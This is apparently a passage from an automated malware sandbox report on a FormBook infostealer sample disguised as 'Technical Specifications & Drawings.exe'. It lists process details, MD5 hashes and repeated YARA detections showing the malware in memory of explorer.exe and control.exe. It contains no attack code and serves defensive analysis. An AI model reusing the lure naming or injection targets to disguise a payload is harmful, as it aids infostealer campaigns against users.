                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.264997908.0000000002BA2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263808361.0000000002973000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:low

                                                General

                                                Target ID:4
                                                Start time:12:27:16
                                                Start date:08/08/2022
                                                Path:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                Imagebase:0xd20000
                                                File size:800256 bytes
                                                MD5 hash:9B94F751E8CC145058DB9F428C2AD571
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Target ID:5
                                                Start time:12:27:19
                                                Start date:08/08/2022
                                                Path:C:\Windows\explorer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\Explorer.EXE
                                                Imagebase:0x7ff6b8cf0000
                                                File size:3933184 bytes
                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Target ID:19
                                                Start time:12:27:54
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\control.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\control.exe
                                                Imagebase:0x1c0000
                                                File size:114688 bytes
                                                MD5 hash:40FBA3FBFD5E33E0DE1BA45472FDA66F
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                No disassembly